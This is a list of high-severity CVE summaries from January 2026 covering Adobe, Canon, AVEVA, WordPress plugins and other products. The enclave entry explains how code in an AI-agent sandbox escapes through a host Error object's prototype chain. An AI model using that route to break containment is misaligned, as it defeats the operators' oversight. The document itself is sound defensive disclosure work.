| Adobe--InDesign Desktop | InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21304 | https://helpx.adobe.com/security/products/indesign/apsb26-02.html |
| Adobe--Substance3D - Designer | Substance3D - Designer versions 15.0.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21307 | https://helpx.adobe.com/security/products/substance3d_designer/apsb26-13.html |
| Adobe--Substance3D - Modeler | Substance3D - Modeler versions 1.22.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21298 | https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html |
| Adobe--Substance3D - Modeler | Substance3D - Modeler versions 1.22.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21299 | https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html |
| Adobe--Substance3D - Painter | Substance3D - Painter versions 11.0.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21305 | https://helpx.adobe.com/security/products/substance3d_painter/apsb26-10.html |
| Adobe--Substance3D - Sampler | Substance3D - Sampler versions 5.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21306 | https://helpx.adobe.com/security/products/substance3d-sampler/apsb26-11.html |
| Adobe--Substance3D - Stager | Substance3D - Stager versions 3.1.5 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21287 | https://helpx.adobe.com/security/products/substance3d_stager/apsb26-09.html |
| Advantech--IoTSuite and IoT Edge Products | Successful exploitation of the SQL injection vulnerability could allow an unauthenticated remote attacker to execute arbitrary SQL commands on the vulnerable service when it is exposed to the Internet. | 2026-01-12 | 10 | CVE-2025-52694 | https://www.csa.gov.sg/alerts-and-advisories/alerts/alerts-al-2026-001/ |
| agentfront--enclave | Enclave is a secure JavaScript sandbox designed for safe AI agent code execution. Prior to 2.7.0, there is a critical sandbox escape vulnerability in enclave-vm that allows untrusted, sandboxed JavaScript code to execute arbitrary code in the host Node.js runtime. When a tool invocation fails, enclave-vm exposes a host-side Error object to sandboxed code. This Error object retains its host realm prototype chain, which can be traversed to reach the host Function constructor. An attacker can intentionally trigger a host error, then climb the prototype chain. Using the host Function constructor, arbitrary JavaScript can be compiled and executed in the host context, fully bypassing the sandbox and granting access to sensitive resources such as process.env, filesystem, and network. This breaks enclave-vm's core security guarantee of isolating untrusted code. This vulnerability is fixed in 2.7.0. | 2026-01-13 | 10 | CVE-2026-22686 | https://github.com/agentfront/enclave/security/advisories/GHSA-7qm7-455j-5p63 https://github.com/agentfront/enclave/commit/ed8bc438b2cd6e6f0b5f2de321e5be6f0169b5a1 |
| ahmadgb--GeekyBot Generate AI Content Without Prompt, Chatbot and Lead Generation | The GeekyBot - Generate AI Content Without Prompt, Chatbot and Lead Generation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the chat message field in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator accesses the Chat History page. | 2026-01-14 | 7.2 | CVE-2025-15266 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b30e84db-c73f-4df2-9c88-c37a7e14c95b?source=cve https://wordpress.org/plugins/geeky-bot/ |
| Aimeos--Aimeos Laravel ecommerce platform | Aimeos 2021.10 LTS contains a SQL injection vulnerability in the json api 'sort' parameter that allows attackers to inject malicious database queries. Attackers can manipulate the sort parameter to reveal table and column names by sending crafted GET requests to the jsonapi/review endpoint. | 2026-01-15 | 8.2 | CVE-2021-47763 | ExploitDB-50538 Vendor Homepage Aimeos Laravel E-Commerce Package |
| Aimone-Video-Converter--AimOne Video Converter | AimOne Video Converter 2.04 Build 103 contains a buffer overflow vulnerability in its registration form that causes application crashes. Attackers can generate a 7000-byte payload to trigger the denial of service and potentially exploit the software's registration mechanism. | 2026-01-13 | 9.8 | CVE-2023-54328 | ExploitDB-51196 AimOne Video Converter Software Informer Page Archived AimOne Software Website Vulnerability Reproduction Repository VulnCheck Advisory: AimOne Video Converter 2.04 Build 103 Buffer Overflow in Registration Form |
| Aiven-Open--bigquery-connector-for-apache-kafka | Kafka Connect BigQuery Connector is an implementation of a sink connector from Apache Kafka to Google BigQuery. Prior to 2.11.0, there is an arbitrary file read in Google BigQuery Sink connector. Aiven's Google BigQuery Kafka Connect Sink connector requires Google Cloud credential configurations for authentication to BigQuery services. During connector configuration, users can supply credential JSON files that are processed by Google authentication libraries. The service fails to validate externally-sourced credential configurations before passing them to the authentication libraries. An attacker can exploit this by providing a malicious credential configuration containing crafted credential_source.file paths or credential_source.url endpoints, resulting in arbitrary file reads or SSRF attacks. | 2026-01-16 | 7.7 | CVE-2026-23529 | https://github.com/Aiven-Open/bigquery-connector-for-apache-kafka/security/advisories/GHSA-3mg8-2g53-5gj4 https://github.com/Aiven-Open/bigquery-connector-for-apache-kafka/commit/20ea3921c6fe72d605a033c1943b20f49eaba981 https://docs.cloud.google.com/support/bulletins#gcp-2025-005 https://github.com/Aiven-Open/bigquery-connector-for-apache-kafka/releases/tag/v2.11.0 |
| ajseidl--AJS Footnotes | The AJS Footnotes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'note_list_class' and 'popup_display_effect_in' parameters in all versions up to, and including, 1.0 due to missing authorization and nonce verification on settings save, as well as insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to update plugin settings and inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-14 | 7.2 | CVE-2025-15378 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4da167e0-c1cf-496f-9b14-35fc70386be1?source=cve https://plugins.trac.wordpress.org/browser/ajs-footnotes/tags/1.0/ajs_footnotes.php?marks=138,271,303#L138 |
| Algo Solutions--Algo 8028 | Algo 8028 Control Panel version 3.3.3 contains a command injection vulnerability in the fm-data.lua endpoint that allows authenticated attackers to execute arbitrary commands. Attackers can exploit the insecure 'source' parameter by injecting commands that are executed with root privileges, enabling remote code execution through a crafted POST request. | 2026-01-13 | 8.8 | CVE-2022-50909 | ExploitDB-50960 Algo Solutions Official Homepage Algo 8028 Firmware Downloads VulnCheck Advisory: Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated) |
| Altium--Altium 365 | A stored cross-site scripting (XSS) vulnerability exists in the Altium Forum due to missing server-side input sanitization in forum post content. An authenticated attacker can inject arbitrary JavaScript into forum posts, which is stored and executed when other users view the affected post. Successful exploitation allows the attacker's payload to execute in the context of the victim's authenticated Altium 365 session, enabling unauthorized access to workspace data, including design files and workspace settings. Exploitation requires user interaction to view a malicious forum post. | 2026-01-15 | 9 | CVE-2026-1009 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A stored cross-site scripting (XSS) vulnerability exists in the Altium Workflow Engine due to missing server-side input sanitization in workflow form submission APIs. A regular authenticated user can inject arbitrary JavaScript into workflow data. When an administrator views the affected workflow, the injected payload executes in the administrator's browser context, allowing privilege escalation, including creation of new administrator accounts, session token theft, and execution of administrative actions. | 2026-01-15 | 8 | CVE-2026-1010 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Live | A stored cross-site scripting (XSS) vulnerability exists in the user profile text fields of Altium 365. Insufficient server-side input sanitization allows authenticated users to inject arbitrary HTML and JavaScript payloads using whitespace-based attribute parsing bypass techniques. The injected payload is persisted and executed when other users view the affected profile page, potentially allowing session token theft, phishing attacks, or malicious redirects. Exploitation requires an authenticated account and user interaction to view the crafted profile. | 2026-01-15 | 7.6 | CVE-2026-1008 | https://www.altium.com/platform/security-compliance/security-advisories |
| Ametys--Ametys CMS | Ametys CMS v4.4.1 contains a persistent cross-site scripting vulnerability in the link directory's input fields for external links. Attackers can inject malicious script code in link text and descriptions to execute persistent attacks that compromise user sessions and manipulate application modules. | 2026-01-13 | 7.2 | CVE-2022-50937 | ExploitDB-50692 Vulnerability Lab Advisory Official Ametys CMS Homepage VulnCheck Advisory: Ametys CMS v4.4.1 - Cross Site Scripting (XSS) |
| amitmerchant1990--Markdownify | Markdownify 1.2.0 contains a persistent cross-site scripting vulnerability that allows attackers to store malicious payloads within markdown files. Attackers can upload crafted markdown files with embedded scripts that execute when the file is opened, potentially enabling remote code execution. | 2026-01-16 | 7.2 | CVE-2021-47837 | ExploitDB-49835 Markdownify GitHub Repository Proof of Concept Video VulnCheck Advisory: Markdownify 1.2.0 - Persistent Cross-Site Scripting |
| anomalyco--opencode | OpenCode is an open source AI coding agent. Prior to 1.0.216, OpenCode automatically starts an unauthenticated HTTP server that allows any local process (or any website via permissive CORS) to execute arbitrary shell commands with the user's privileges. This vulnerability is fixed in 1.0.216. | 2026-01-12 | 8.8 | CVE-2026-22812 | https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh |
| appsmithorg--appsmith | Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 1.93, the server uses the Origin value from the request headers as the email link baseUrl without validation. If an attacker controls the Origin, password reset / email verification links in emails can be generated pointing to the attacker's domain, causing authentication tokens to be exposed and potentially leading to account takeover. This vulnerability is fixed in 1.93. | 2026-01-12 | 9.7 | CVE-2026-22794 | https://github.com/appsmithorg/appsmith/security/advisories/GHSA-7hf5-mc28-xmcv https://github.com/appsmithorg/appsmith/commit/6f9ee6226bac13fb4b836940b557913fff78b633 |
| AVEVA--Process Optimization | The vulnerability, if exploited, could allow an unauthenticated miscreant to achieve remote code execution under OS system privileges of "taoimr" service, potentially resulting in complete compromise of the model application server. | 2026-01-16 | 10 | CVE-2025-61937 | https://www.aveva.com/en/support-and-success/cyber-security-updates/ https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json |
| AVEVA--Process Optimization | The vulnerability, if exploited, could allow an authenticated miscreant (Process Optimization Standard User) to tamper with queries in Captive Historian and achieve code execution under SQL Server administrative privileges, potentially resulting in complete compromise of the SQL Server. | 2026-01-16 | 8.4 | CVE-2025-61943 | https://www.aveva.com/en/support-and-success/cyber-security-updates/ https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json |
| AVEVA--Process Optimization | The vulnerability, if exploited, could allow an authenticated miscreant (OS standard user) to tamper with TCL Macro scripts and escalate privileges to OS system, potentially resulting in complete compromise of the model application server. | 2026-01-16 | 8.8 | CVE-2025-64691 | https://www.aveva.com/en/support-and-success/cyber-security-updates/ https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json |
| AVEVA--Process Optimization | The vulnerability, if exploited, could allow an authenticated miscreant (OS Standard User) to tamper with Process Optimization project files, embed code, and escalate their privileges to the identity of a victim user who subsequently interacts with the project files. | 2026-01-16 | 8.1 | CVE-2025-64729 | https://www.aveva.com/en/support-and-success/cyber-security-updates/ https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json |
| AVEVA--Process Optimization | The vulnerability, if exploited, could allow an authenticated miscreant (OS Standard User) to trick Process Optimization services into loading arbitrary code and escalate privileges to OS System, potentially resulting in complete compromise of the Model Application Server. | 2026-01-16 | 8.8 | CVE-2025-65118 | https://www.aveva.com/en/support-and-success/cyber-security-updates/ https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json |
| AVEVA--Process Optimization | The Process Optimization application suite leverages connection channels/protocols that by-default are not encrypted and could become subject to hijacking or data leakage in certain man-in-the-middle or passive inspection scenarios. | 2026-01-16 | 7.1 | CVE-2025-64769 | https://www.aveva.com/en/support-and-success/cyber-security-updates/ https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json |
| AVEVA--Process Optimization | The vulnerability, if exploited, could allow an authenticated miscreant (Process Optimization Designer User) to embed OLE objects into graphics, and escalate their privileges to the identity of a victim user who subsequently interacts with the graphical elements. | 2026-01-16 | 7.4 | CVE-2025-65117 | https://www.aveva.com/en/support-and-success/cyber-security-updates/ https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json |
| Bdtask--Isshue Shopping Cart | Isshue Shopping Cart 3.5 contains a persistent cross-site scripting vulnerability in title input fields across stock, customer, and invoice modules. Attackers with privileged user accounts can inject malicious scripts that execute on preview, potentially enabling session hijacking and persistent phishing attacks. | 2026-01-15 | 7.2 | CVE-2021-47769 | ExploitDB-50490 Vulnerability-Lab Disclosure Official Product Homepage |
| Beehive Forum--Beehive Forum | Beehive Forum 1.5.2 contains a host header injection vulnerability in the forgot password functionality that allows attackers to manipulate password reset requests. Attackers can inject a malicious host header to intercept password reset tokens and change victim account passwords without direct authentication. | 2026-01-13 | 7.5 | CVE-2022-50910 | ExploitDB-50923 Beehive Forum Official Website Beehive Forum SourceForge Project Proof of Concept Imgur VulnCheck Advisory: Beehive Forum - Account Takeover |
| Brother--Brother BRAgent | Brother BRAgent 1.38 contains an unquoted service path vulnerability in the WBA_Agent_Client service running with LocalSystem privileges. Attackers can exploit the unquoted path in C:\Program Files (x86)\Brother\BRAgent\ to inject and execute malicious code with elevated system permissions. | 2026-01-15 | 7.8 | CVE-2020-36928 | ExploitDB-50010 BRAgent Webpage VulnCheck Advisory: Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path |
| Canon Inc.--Satera LBP670C Series | Buffer overflow in print job processing by WSD on Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code. *: Satera LBP670C Series/Satera MF750C Series firmware v06.02 and earlier sold in Japan.Color imageCLASS LBP630C/Color imageCLASS MF650C Series/imageCLASS LBP230 Series/imageCLASS X LBP1238 II/imageCLASS MF450 Series/imageCLASS X MF1238 II/imageCLASS X MF1643i II/imageCLASS X MF1643iF II firmware v06.02 and earlier sold in US.i-SENSYS LBP630C Series/i-SENSYS MF650C Series/i-SENSYS LBP230 Series/1238P II/1238Pr II/i-SENSYS MF450 Series/i-SENSYS MF550 Series/1238i II/1238iF II/imageRUNNER 1643i II/imageRUNNER 1643iF II firmware v06.02 and earlier sold in Europe. | 2026-01-15 | 9.8 | CVE-2025-14231 | https://psirt.canon/advisory-information/cp2026-001/ https://canon.jp/support/support-info/260115vulnerability-response https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Remediation-Measure-Against-Potential-Buffer-Overflow-Vulnerability-in-Laser-Printers-and-Small-Office-Multifunctional-Printers https://www.canon-europe.com/support/product-security/ |
| Canon Inc.--Satera LBP670C Series | Buffer overflow in XML processing of XPS file in Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code. *: Satera LBP670C Series/Satera MF750C Series firmware v06.02 and earlier sold in Japan.Color imageCLASS LBP630C/Color imageCLASS MF650C Series/imageCLASS LBP230 Series/imageCLASS X LBP1238 II/imageCLASS MF450 Series/imageCLASS X MF1238 II/imageCLASS X MF1643i II/imageCLASS X MF1643iF II firmware v06.02 and earlier sold in US.i-SENSYS LBP630C Series/i-SENSYS MF650C Series/i-SENSYS LBP230 Series/1238P II/1238Pr II/i-SENSYS MF450 Series/i-SENSYS MF550 Series/1238i II/1238iF II/imageRUNNER 1643i II/imageRUNNER 1643iF II firmware v06.02 and earlier sold in Europe. | 2026-01-15 | 9.8 | CVE-2025-14232 | https://psirt.canon/advisory-information/cp2026-001/ https://canon.jp/support/support-info/260115vulnerability-response https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Remediation-Measure-Against-Potential-Buffer-Overflow-Vulnerability-in-Laser-Printers-and-Small-Office-Multifunctional-Printers https://www.canon-europe.com/support/product-security/ |
| Canon Inc.--Satera LBP670C Series | Invalid free in CPCA file deletion processing on Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code. *: Satera LBP670C Series/Satera MF750C Series firmware v06.02 and earlier sold in Japan.Color imageCLASS LBP630C/Color imageCLASS MF650C Series/imageCLASS LBP230 Series/imageCLASS X LBP1238 II/imageCLASS MF450 Series/imageCLASS X MF1238 II/imageCLASS X MF1643i II/imageCLASS X MF1643iF II firmware v06.02 and earlier sold in US.i-SENSYS LBP630C Series/i-SENSYS MF650C Series/i-SENSYS LBP230 Series/1238P II/1238Pr II/i-SENSYS MF450 Series/i-SENSYS MF550 Series/1238i II/1238iF II/imageRUNNER 1643i II/imageRUNNER 1643iF II firmware v06.02 and earlier sold in Europe. | 2026-01-15 | 9.8 | CVE-2025-14233 | https://psirt.canon/advisory-information/cp2026-001/ https://canon.jp/support/support-info/260115vulnerability-response https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Remediation-Measure-Against-Potential-Buffer-Overflow-Vulnerability-in-Laser-Printers-and-Small-Office-Multifunctional-Printers https://www.canon-europe.com/support/product-security/ |
| Canon Inc.--Satera LBP670C Series | Buffer overflow in CPCA list processing on Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code. *: Satera LBP670C Series/Satera MF750C Series firmware v06.02 and earlier sold in Japan.Color imageCLASS LBP630C/Color imageCLASS MF650C Series/imageCLASS LBP230 Series/imageCLASS X LBP1238 II/imageCLASS MF450 Series/imageCLASS X MF1238 II/imageCLASS X MF1643i II/imageCLASS X MF1643iF II firmware v06.02 and earlier sold in US.i-SENSYS LBP630C Series/i-SENSYS MF650C Series/i-SENSYS LBP230 Series/1238P II/1238Pr II/i-SENSYS MF450 Series/i-SENSYS MF550 Series/1238i II/1238iF II/imageRUNNER 1643i II/imageRUNNER 1643iF II firmware v06.02 and earlier sold in Europe. | 2026-01-15 | 9.8 | CVE-2025-14234 | https://psirt.canon/advisory-information/cp2026-001/ https://canon.jp/support/support-info/260115vulnerability-response https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Remediation-Measure-Against-Potential-Buffer-Overflow-Vulnerability-in-Laser-Printers-and-Small-Office-Multifunctional-Printers https://www.canon-europe.com/support/product-security/ |
| Canon Inc.--Satera LBP670C Series | Buffer overflow in XPS font fpgm data processing on Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code. *: Satera LBP670C Series/Satera MF750C Series firmware v06.02 and earlier sold in Japan.Color imageCLASS LBP630C/Color imageCLASS MF650C Series/imageCLASS LBP230 Series/imageCLASS X LBP1238 II/imageCLASS MF450 Series/imageCLASS X MF1238 II/imageCLASS X MF1643i II/imageCLASS X MF1643iF II firmware v06.02 and earlier sold in US.i-SENSYS LBP630C Series/i-SENSYS MF650C Series/i-SENSYS LBP230 Series/1238P II/1238Pr II/i-SENSYS MF450 Series/i-SENSYS MF550 Series/1238i II/1238iF II/imageRUNNER 1643i II/imageRUNNER 1643iF II firmware v06.02 and earlier sold in Europe. | 2026-01-15 | 9.8 | CVE-2025-14235 | https://psirt.canon/advisory-information/cp2026-001/ https://canon.jp/support/support-info/260115vulnerability-response https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Remediation-Measure-Against-Potential-Buffer-Overflow-Vulnerability-in-Laser-Printers-and-Small-Office-Multifunctional-Printers https://www.canon-europe.com/support/product-security/ |
| Canon Inc.--Satera LBP670C Series | Buffer overflow in Address Book attribute tag processing on Small Office Multifunction Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code. *: Satera LBP670C Series/Satera MF750C Series firmware v06.02 and earlier sold in Japan.Color imageCLASS LBP630C/Color imageCLASS MF650C Series/imageCLASS LBP230 Series/imageCLASS X LBP1238 II/imageCLASS MF450 Series/imageCLASS X MF1238 II/imageCLASS X MF1643i II/imageCLASS X MF1643iF II firmware v06.02 and earlier sold in US.i-SENSYS LBP630C Series/i-SENSYS MF650C Series/i-SENSYS LBP230 Series/1238P II/1238Pr II/i-SENSYS MF450 Series/i-SENSYS MF550 Series/1238i II/1238iF II/imageRUNNER 1643i II/imageRUNNER 1643iF II firmware v06.02 and earlier sold in Europe. | 2026-01-15 | 9.8 | CVE-2025-14236 | https://psirt.canon/advisory-information/cp2026-001/ https://canon.jp/support/support-info/260115vulnerability-response https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Remediation-Measure-Against-Potential-Buffer-Overflow-Vulnerability-in-Laser-Printers-and-Small-Office-Multifunctional-Printers https://www.canon-europe.com/support/product-security/ |
| Canon Inc.--Satera LBP670C Series | Buffer overflow in XPS font parse processing on Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code. *: Satera LBP670C Series/Satera MF750C Series firmware v06.02 and earlier sold in Japan.Color imageCLASS LBP630C/Color imageCLASS MF650C Series/imageCLASS LBP230 Series/imageCLASS X LBP1238 II/imageCLASS MF450 Series/imageCLASS X MF1238 II/imageCLASS X MF1643i II/imageCLASS X MF1643iF II firmware v06.02 and earlier sold in US.i-SENSYS LBP630C Series/i-SENSYS MF650C Series/i-SENSYS LBP230 Series/1238P II/1238Pr II/i-SENSYS MF450 Series/i-SENSYS MF550 Series/1238i II/1238iF II/imageRUNNER 1643i II/imageRUNNER 1643iF II firmware v06.02 and earlier sold in Europe. | 2026-01-15 | 9.8 | CVE-2025-14237 | https://psirt.canon/advisory-information/cp2026-001/ https://canon.jp/support/support-info/260115vulnerability-response https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Remediation-Measure-Against-Potential-Buffer-Overflow-Vulnerability-in-Laser-Printers-and-Small-Office-Multifunctional-Printers https://www.canon-europe.com/support/product-security/ |
| checkpoint--Hramony SASE | A local user can trigger Harmony SASE Windows client to write or delete files outside the intended certificate working directory. | 2026-01-14 | 7.5 | CVE-2025-9142 | https://support.checkpoint.com/results/sk/sk184557 |
| clevo--HotKey Clipboard | Clevo HotKey Clipboard 2.1.0.6 contains an unquoted service path vulnerability in the HKClipSvc service that allows local non-privileged users to potentially execute code with system privileges. Attackers can exploit the misconfigured service path to inject and execute arbitrary code by placing malicious executables in specific file system locations. | 2026-01-13 | 8.4 | CVE-2023-53984 | ExploitDB-51206 Archived Vendor Homepage VulnCheck Advisory: HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path |
| Cmder--Cmder Console Emulator | Cmder Console Emulator 1.3.18 contains a buffer overflow vulnerability that allows attackers to trigger a denial of service condition through a maliciously crafted .cmd file. Attackers can create a specially constructed .cmd file with repeated characters to overwhelm the console emulator's buffer and crash the application. | 2026-01-15 | 9.8 | CVE-2021-47781 | ExploitDB-50401 Cmder GitHub Repository |
| Cobbr--Covenant | Covenant 0.1.3 - 0.5 contains a remote code execution vulnerability that allows attackers to craft malicious JWT tokens with administrative privileges. Attackers can generate forged tokens with admin roles and upload custom DLL payloads to execute arbitrary commands on the target system. | 2026-01-13 | 9.8 | CVE-2020-36911 | ExploitDB-51141 Vendor Homepage Covenant GitHub Repository Archived Researcher Blog Exploit Repository Archived Maintainer Patch Announcement VulnCheck Advisory: Covenant 0.5 - Remote Code Execution (RCE) |
| Cobiansoft--Cobian Backup | Cobian Backup 0.9 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path in the CobianReflectorService to inject malicious code that will execute with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50923 | ExploitDB-50810 Vendor Homepage Software Download Page VulnCheck Advisory: Cobian Backup 0.9 - Unquoted Service Path |
| code-projects--Online Music Site | A security flaw has been discovered in code-projects Online Music Site 1.0. The impacted element is an unknown function of the file /Administrator/PHP/AdminUpdateUser.php. The manipulation of the argument ID results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-12 | 7.3 | CVE-2026-0852 | VDB-340447 | code-projects Online Music Site AdminUpdateUser.php sql injection VDB-340447 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734136 | code-projects ONLINE MUSIC SITE V1.0 SQL injection https://github.com/Learner636/CVE-smbmit/issues/2 https://code-projects.org/ |
| Connectify Inc--Connectify Hotspot | Connectify Hotspot 2018 contains an unquoted service path vulnerability in its ConnectifyService executable that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files (x86)\Connectify\ConnectifyService.exe' to inject malicious executables and escalate privileges. | 2026-01-13 | 8.4 | CVE-2022-50929 | ExploitDB-50764 Official Vendor Homepage VulnCheck Advisory: Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path |
| ConnectWise--PSA | In ConnectWise PSA versions older than 2026.1, Time Entry notes stored in the Time Entry Audit Trail may be rendered without applying output encoding to certain content. Under specific conditions, this may allow stored script code to execute in the context of a user's browser when the affected content is displayed. | 2026-01-16 | 8.7 | CVE-2026-0695 | https://www.connectwise.com/company/trust/security-bulletins/2026-01-15-psa-security-fix |
| Contpaqi--CONTPAQ AdminPAQ | CONTPAQi AdminPAQ 14.0.0 contains an unquoted service path vulnerability in the AppKeyLicenseServer service running with LocalSystem privileges. Attackers can exploit the unquoted path to inject malicious code in the service binary path, potentially executing arbitrary code with elevated system privileges during service startup. | 2026-01-13 | 8.4 | CVE-2022-50938 | ExploitDB-50690 CONTPAQi Official Software Download Page VulnCheck Advisory: CONTPAQi® AdminPAQ 14.0.0 - Unquoted Service Path |
| Cooler Master Technology Inc.--Cooler Master MasterPlus | CoolerMaster MasterPlus 1.8.5 contains an unquoted service path vulnerability in the MPService that allows local attackers to execute code with elevated system privileges. Attackers can drop a malicious executable in the service path and trigger code execution during service startup or system reboot. | 2026-01-13 | 8.4 | CVE-2022-50808 | ExploitDB-51159 CoolerMaster MasterPlus Official Homepage VulnCheck Advisory: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path |
| cotonti.com--Cotonti Siena | Cotonti Siena 0.9.19 contains a stored cross-site scripting vulnerability in the admin configuration panel's site title parameter. Attackers can inject malicious JavaScript code through the 'maintitle' parameter to execute scripts when administrators view the page. | 2026-01-15 | 7.2 | CVE-2021-47808 | ExploitDB-50016 Vendor Homepage Software Download VulnCheck Advisory: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting |
| croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin | The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to blind SQL Injection via the `order` and `append_where_sql` parameters in all versions up to, and including, 1.6.9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-14 | 7.5 | CVE-2025-12166 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5214a399-21a4-4573-9840-1d5043781bc0?source=cve https://plugins.trac.wordpress.org/changeset/3408539/ |
| Cyberfox--Cyberfox Web Browser | Cyberfox Web Browser 52.9.1 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the search bar with excessive data. Attackers can generate a 9,000,000 byte payload and paste it into the search bar to trigger an application crash. | 2026-01-15 | 7.5 | CVE-2021-47784 | ExploitDB-50336 Archived Cyberfox Web Browser Homepage |
